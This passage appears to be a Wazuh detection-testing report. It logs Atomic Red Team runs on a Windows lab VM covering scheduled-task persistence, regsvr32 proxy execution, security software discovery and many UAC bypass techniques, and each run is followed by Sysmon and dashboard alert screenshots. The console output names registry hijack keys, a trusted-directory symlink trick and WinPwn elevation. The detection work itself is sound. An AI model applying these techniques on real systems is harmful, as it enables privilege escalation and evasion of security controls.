+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException

Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:95 char:5
+     [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException

Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:96 char:5
+     [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException

Exit code: 0
Done executing test: T1053.005-5 Task Scheduler via VBA
Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task

cmdletOutput                                                   ReturnValue PSComputerName
------------                                                   ----------- --------------
MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\")          0

Exit code: 0
Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
The operation completed successfully.
SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created.
Exit code: 0
Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute

cmdletOutput                                                     ReturnValue PSComputerName
------------                                                     ----------- --------------
MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\")          0

Exit code: 0
Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Executing test: T1053.005-9 PowerShell Modify A Scheduled Task

TaskPath                                       TaskName                          State
--------                                       --------                          -----
\                                              AtomicTaskModifed                 Ready
\                                              AtomicTaskModifed                 Ready
Exit code: 0
Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task
Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
The filename, directory name, or volume label syntax is incorrect.
Exit code: 1
Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
```
Cleanup ```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1053.005-1 Scheduled Task Startup Script SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created. SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created. Exit code: 0 Done executing test: T1053.005-1 Scheduled Task Startup Script Executing test: T1053.005-2 Scheduled task Local SUCCESS: The scheduled task "spawn" has successfully been created. Exit code: 0 Done executing test: T1053.005-2 Scheduled task Local Executing test: T1053.005-3 Scheduled task Remote ERROR: No mapping between account names and security IDs was done. Exit code: 1 Done executing test: T1053.005-3 Scheduled task Remote Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTask Ready Exit code: 0 Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task Executing test: T1053.005-5 Task Scheduler via VBA New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)). At line:70 char:12 + $app = New-Object -ComObject "$officeProduct.Application" + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [New-Object], COMException + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand New-Item : The registry key at the specified path does not exist. 
At line:73 char:34 + if (-not (Test-Path $key)) { New-Item $Key } + CategoryInfo : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentExceptio n + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand + ~~~~~~~~~~~~~ At line:74 char:5 Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist. + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFo undException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand You cannot call a method on a null-valued expression. At line:84 char:9 + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + $doc = $app.Documents.Add() + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:89 char:5 + $comp = $doc.VBProject.VBComponents.Add(1) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:90 char:5 + $comp.CodeModule.AddFromString($macroCode) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:91 char:5 + $app.Run($sub) + ~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:92 char:5 + $doc.Close(0) + ~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. 
+ $app.Quit() + ~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:93 char:5 At line:94 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:95 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:96 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exit code: 0 Done executing test: T1053.005-5 Task Scheduler via VBA Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry The operation completed successfully. SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created. 
Exit code: 0
Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
cmdletOutput                                                          ReturnValue PSComputerName
------------                                                          ----------- --------------
MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\")               0
Exit code: 0
Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Executing test: T1053.005-9 PowerShell Modify A Scheduled Task
TaskPath TaskName          State
-------- --------          -----
\        AtomicTaskModifed Ready
\        AtomicTaskModifed Ready
Exit code: 0
Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task
Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
The filename, directory name, or volume label syntax is incorrect.
Exit code: 1
Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
```
Sysmon event log ![T1053SysmonREg](https://github.com/wazuh/wazuh/assets/95248059/5f623d76-e86e-4e23-858b-53b4bdbb1fe5)
Dashboard alert ![Dashboard1053-1](https://github.com/wazuh/wazuh/assets/95248059/1cc41b4b-bedd-4560-8d9f-b561bc3e87fc) ![Dashboard1053-2](https://github.com/wazuh/wazuh/assets/95248059/16aeb114-7b9e-4267-88bd-13a9c40ef1d5)

T1218.010 – Signed Binary Proxy Execution: Regsvr32

GetPrereqs
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution
Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
Prereq already met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution
No Preqs Defined
GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL
Attempting to satisfy prereq: Test requires a renamed dll file
        1 file(s) copied.
Prereq successfully met: Test requires a renamed dll file
GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
```
Test run
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Exit code: 5
Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception
Exit code:
Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing test: T1218.010-3 Regsvr32 local DLL execution
Exit code: 0
Done executing test: T1218.010-3 Regsvr32 local DLL execution
Executing test: T1218.010-4 Regsvr32 Registering Non DLL
Exit code: 0
Done executing test: T1218.010-4 Regsvr32 Registering Non DLL
Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Exit code: 0
Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
```
Cleanup
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
```
Sysmon event log ![T1218](https://github.com/wazuh/wazuh/assets/95248059/73c03f24-8d49-4d47-80d2-f0f98aa0d96d)
Dashboard event ![Dashboard1218-1](https://github.com/wazuh/wazuh/assets/95248059/c297a8fe-6193-415f-a845-50b4bd60336e) ![Dashboard1218-2](https://github.com/wazuh/wazuh/assets/95248059/a533fc03-82bd-4934-9151-5c8c02d334d2)

T1518.001 – Software Discovery: Security Software Discovery

GetPrereqs
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1518.001 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
GetPrereq's for: T1518.001-1 Security Software Discovery
No Preqs Defined
GetPrereq's for: T1518.001-2 Security Software Discovery - powershell
No Preqs Defined
GetPrereq's for: T1518.001-6 Security Software Discovery - Sysmon Service
No Preqs Defined
GetPrereq's for: T1518.001-7 Security Software Discovery - AV Discovery via WMI
No Preqs Defined
GetPrereq's for: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
No Preqs Defined
GetPrereq's for: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
No Preqs Defined
GetPrereq's for: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
No Preqs Defined
```
Test run outputExec.log
Cleanup
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1518.001 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1518.001-1 Security Software Discovery
Done executing cleanup for test: T1518.001-1 Security Software Discovery
Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service
Done executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service
Executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI
Done executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI
Executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
Done executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
Executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
Done executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
Executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
Done executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
```
Sysmon event log ![T1518](https://github.com/wazuh/wazuh/assets/95248059/c385f43c-5406-4d5f-b35f-924cc0d15ddb)
Dashboard event ![Dashboard1518.001-1](https://github.com/wazuh/wazuh/assets/95248059/c7f183f1-33f1-4a4b-8e51-711f031af482) ![Dashboard1518.001-2](https://github.com/wazuh/wazuh/assets/95248059/37bdf43d-3347-4e29-841b-779a2b75cc46)

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

GetPrereqs
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites met: T1548.002-10 UACME Bypass Method 23
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites met: T1548.002-11 UACME Bypass Method 31
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites met: T1548.002-12 UACME Bypass Method 33
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites met: T1548.002-13 UACME Bypass Method 34
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites met: T1548.002-14 UACME Bypass Method 39
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites met: T1548.002-15 UACME Bypass Method 56
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites met: T1548.002-16 UACME Bypass Method 59
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites met: T1548.002-17 UACME Bypass Method 61
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification
CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys
Prerequisites met: T1548.002-25 Disable UAC notification via registry keys
CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Test run ```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout The operation completed successfully. Microsoft Windows [Version 10.0.22631.3155] (c) Microsoft Corporation. All rights reserved. C:\Users\vagrant\AppData\Local\Temp> Exit code: 0 Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open Name Property ---- -------- command Exit code: 0 Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing test: T1548.002-3 Bypass UAC using Fodhelper The operation completed successfully The operation completed successfully. Exit code: 0 Done executing test: T1548.002-3 Bypass UAC using Fodhelper Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command 
PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories 1 file(s) copied. symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe Exit code: 0 Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open Name Property ---- -------- command (default) : cmd.exe /c notepad.exe DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Exit code: 0 Done executing test: T1548.002-8 Disable UAC using reg.exe Executing test: T1548.002-9 Bypass UAC using SilentCleanup task The screen cannot be set to the number of lines and columns specified. The operation completed successfully. 
Exit code: 0 Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task Executing test: T1548.002-10 UACME Bypass Method 23 Exit code: 1073741845 Done executing test: T1548.002-10 UACME Bypass Method 23 Executing test: T1548.002-11 UACME Bypass Method 31 Exit code: 1073741845 Done executing test: T1548.002-11 UACME Bypass Method 31 Executing test: T1548.002-12 UACME Bypass Method 33 Exit code: 1073741845 Done executing test: T1548.002-12 UACME Bypass Method 33 Executing test: T1548.002-13 UACME Bypass Method 34 Exit code: 1073741845 Done executing test: T1548.002-13 UACME Bypass Method 34 Executing test: T1548.002-14 UACME Bypass Method 39 Exit code: 1073741845 Done executing test: T1548.002-14 UACME Bypass Method 39 Executing test: T1548.002-15 UACME Bypass Method 56 Exit code: 1073741845 Done executing test: T1548.002-15 UACME Bypass Method 56 Executing test: T1548.002-16 UACME Bypass Method 59 Exit code: 1073741845 Done executing test: T1548.002-16 UACME Bypass Method 59 Executing test: T1548.002-17 UACME Bypass Method 61 Exit code: 1073741845 Done executing test: T1548.002-17 UACME Bypass Method 61 Executing test: T1548.002-18 WinPwn - UAC Magic Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM LocalRecon d----- 2/27/2024 12:12 PM DomainRecon Directory: C:\Users\vagrant\AppData\Local\Temp\DomainRecon Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM ADrecon Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM LocalPrivEsc d----- 2/27/2024 12:12 PM Exploitation d----- 2/27/2024 12:12 PM Vulnerabilities __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass [!] 
Session is elevated! Exit code: 0 Done executing test: T1548.002-18 WinPwn - UAC Magic Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 26 2 416 1344 0.00 10340 1 cmstp False True Hwnd : 2950888 Process : cmstp Exit code: 0 Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Exit code: 0 Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Exit code: 0 Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Exit code: 0 Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Exit code: 0 Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Exit code: 0 Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. 
Exit code: 0 Done executing test: T1548.002-25 Disable UAC notification via registry keys Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```
Cleanup
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
